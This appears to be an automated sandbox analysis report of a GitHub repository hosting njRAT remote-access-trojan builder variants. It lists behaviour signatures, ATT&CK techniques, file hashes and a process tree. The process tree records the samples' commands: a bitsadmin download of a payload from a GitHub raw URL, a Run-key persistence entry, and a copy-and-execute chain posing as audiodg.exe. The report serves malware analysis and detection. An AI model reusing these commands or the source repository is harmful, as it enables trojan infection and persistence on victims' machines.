hxxps://github[.]com/BlackAll9/NjRat[.]0[.]7D[.]git

Analysis

max time kernel
127s
max time network
127s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
20/09/2024, 21:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/BlackAll9/NjRat.0.7D.git

Score

8^/10

discovery dropper persistence

Malware Config

Signatures

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
3172	bitsadmin.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	NjRat 0.7D.exe

Executes dropped EXE 6 IoCs

pid	Process
2112	NjRat 0.7D Danger Edition.exe
4068	NjRat 0.7D Golden Edition - Rus.exe
1492	NjRat Lime Edition 0.8.0.exe
848	NjRat 0.7D.exe
4404	NjRat 0.7D.exe
3292	audiodg.exe

Loads dropped DLL 8 IoCs

pid	Process
2112	NjRat 0.7D Danger Edition.exe
2112	NjRat 0.7D Danger Edition.exe
2112	NjRat 0.7D Danger Edition.exe
2112	NjRat 0.7D Danger Edition.exe
1492	NjRat Lime Edition 0.8.0.exe
1492	NjRat Lime Edition 0.8.0.exe
1492	NjRat Lime Edition 0.8.0.exe
1492	NjRat Lime Edition 0.8.0.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "C:\\Windows\\Isolation graphique de périphérique audio Windows .exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
82	raw.githubusercontent.com
81	raw.githubusercontent.com

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	dw20.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2192	4404	WerFault.exe	112

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NjRat 0.7D Danger Edition.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NjRat Lime Edition 0.8.0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dw20.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NjRat 0.7D.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	audiodg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4844	PING.EXE
1300	cmd.exe
4224	PING.EXE
3872	cmd.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	dw20.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	dw20.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dw20.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133713429491242192"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings	NjRat 0.7D.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
4224	PING.EXE
4844	PING.EXE

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
1104	chrome.exe
1104	chrome.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3292	audiodg.exe
3812	chrome.exe
3812	chrome.exe
3812	chrome.exe
3812	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
1104	chrome.exe
1104	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe
Token: SeShutdownPrivilege	1104	chrome.exe
Token: SeCreatePagefilePrivilege	1104	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1728	7zG.exe
2112	NjRat 0.7D Danger Edition.exe
2112	NjRat 0.7D Danger Edition.exe

Suspicious use of SendNotifyMessage 37 IoCs

pid	Process
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
2112	NjRat 0.7D Danger Edition.exe
2112	NjRat 0.7D Danger Edition.exe
2112	NjRat 0.7D Danger Edition.exe
2112	NjRat 0.7D Danger Edition.exe
4068	NjRat 0.7D Golden Edition - Rus.exe
4068	NjRat 0.7D Golden Edition - Rus.exe
4068	NjRat 0.7D Golden Edition - Rus.exe
4068	NjRat 0.7D Golden Edition - Rus.exe
1492	NjRat Lime Edition 0.8.0.exe
1492	NjRat Lime Edition 0.8.0.exe
1492	NjRat Lime Edition 0.8.0.exe
1492	NjRat Lime Edition 0.8.0.exe
4404	NjRat 0.7D.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1104 wrote to memory of 1788	1104	chrome.exe	85
PID 1104 wrote to memory of 1788	1104	chrome.exe	85
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 3132	1104	chrome.exe	86
PID 1104 wrote to memory of 1860	1104	chrome.exe	87
PID 1104 wrote to memory of 1860	1104	chrome.exe	87
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88
PID 1104 wrote to memory of 1272	1104	chrome.exe	88

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/BlackAll9/NjRat.0.7D.git
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb2b8fcc40,0x7ffb2b8fcc4c,0x7ffb2b8fcc58
  2⤵
  PID:1788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1848,i,17373178958524139703,4986927206718346220,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1844 /prefetch:2
  2⤵
  PID:3132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2104,i,17373178958524139703,4986927206718346220,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2116 /prefetch:3
  2⤵
  PID:1860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1720,i,17373178958524139703,4986927206718346220,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2396 /prefetch:8
  2⤵
  PID:1272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,17373178958524139703,4986927206718346220,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3152 /prefetch:1
  2⤵
  PID:3320
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3116,i,17373178958524139703,4986927206718346220,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3168 /prefetch:1
  2⤵
  PID:3808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4500,i,17373178958524139703,4986927206718346220,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4364 /prefetch:8
  2⤵
  PID:4108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4884,i,17373178958524139703,4986927206718346220,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4588 /prefetch:8
  2⤵
  PID:628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4940,i,17373178958524139703,4986927206718346220,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4892 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3812

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4472

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1820

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap21165:92:7zEvent22784
1⤵
- Suspicious use of FindShellTrayWindow
PID:1728

C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\NjRat 0.7D Danger Edition.exe
"C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Danger Edition\NjRat 0.7D Danger Edition.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2112

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4fc 0x338
1⤵
PID:4704

C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Golden Edition\NjRat 0.7D Golden Edition - Rus.exe
"C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat 0.7D Golden Edition\NjRat 0.7D Golden Edition - Rus.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:4068

C:\Users\Admin\Downloads\NjRat.0.7D-main\njRAT Lime Edition\NjRat Lime Edition 0.8.0.exe
"C:\Users\Admin\Downloads\NjRat.0.7D-main\njRAT Lime Edition\NjRat Lime Edition 0.8.0.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SendNotifyMessage
PID:1492

C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat.0.7D\NjRat 0.7D.exe
"C:\Users\Admin\Downloads\NjRat.0.7D-main\NjRat.0.7D\NjRat 0.7D.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:848
- C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe
  "C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SendNotifyMessage
  PID:4404
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
    dw20.exe -x -s 1388
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:3400
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 1368
    3⤵
    - Program crash
    PID:2192
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\install.vbs"
  2⤵
  - Checks computer location settings
  PID:1880
- - C:\Windows\System32\bitsadmin.exe
    "C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority normal https://raw.githubusercontent.com/BlackAll9/rrr/main/MicrosoftEdge.rar C:\Users\Admin\AppData\Roaming\MicrosoftEdge.rar
    3⤵
    - Download via BitsAdmin
    PID:3172
- C:\Users\Admin\AppData\Roaming\audiodg.exe
  "C:\Users\Admin\AppData\Roaming\audiodg.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:3292
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg" /t REG_SZ /d "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1300
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 9
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4224
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg" /t REG_SZ /d "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:2876
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c ping 127.0.0.1 -n 16 > nul && copy "C:\Users\Admin\AppData\Roaming\audiodg.exe" "C:\Windows\Isolation graphique de périphérique audio Windows .exe" && ping 127.0.0.1 -n 16 > nul && "C:\Windows\Isolation graphique de périphérique audio Windows .exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3872
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 16
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4404 -ip 4404
1⤵
PID:3260

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

BITS Jobs

T1197

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\6b8d788a-c612-4ea9-8923-a6391d107d5b.tmp

Filesize
9KB

MD5
34216c8c37f987796bf850701a18cebe

SHA1
fcdde7cb9f364bca75c61639ed5dc8c0fdea3e89

SHA256
fb3335d13c8157f9b4b49e5227d3ff661349b4df446a5f2d57755100c405cd4b

SHA512
6e6a3b5369415592a62bf27bc8ce6e9129c94a95dfeccf08d050656cab1a6a21794e4e674a86344ff411353ea7cb2fa7ae9d2538c6190a0f7f7fb8663a8670c9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
3e44b1eda08842a8eb7374418dc0c018

SHA1
d14e71f624af13a2ddd3507395666525a75b6d4f

SHA256
370d2afa1bc763817e9dd7d481c4ab903a91431f87b4ca75e56ac60734b2d9ab

SHA512
c5e9b73e74619ef366dba6ef07d4918a80cbe04f3817dee91eeda23e8b5fd1966fbe9d6b9cee35292f23fec2c58fabe24046aa51a979fd33f098035899f10977

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
094b11060d0dbf4d4b13f0dbb6d1a286

SHA1
aeff4811327e5095dda0dd8b6c4db4553026287d

SHA256
bfdddb1ededc8ba6eada4464f20e67939c864932e65c804404ca39065c1c7bb2

SHA512
99cb846b9883fa89f7e8ddc60a7295ef0497c76788c805318379b5147a4862ea042635f85e074d9504b4348e7bcde3db5e453055a656b754d6435f08550e21e5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
78cf43fae0e10aa29320faea007def5d

SHA1
b56dc3024e0fb1b2b9b776818294dcd05d57c184

SHA256
6ab02adfe3c376a2be642606d388e453f49d6cc3c42bea30758cb8e1de075840

SHA512
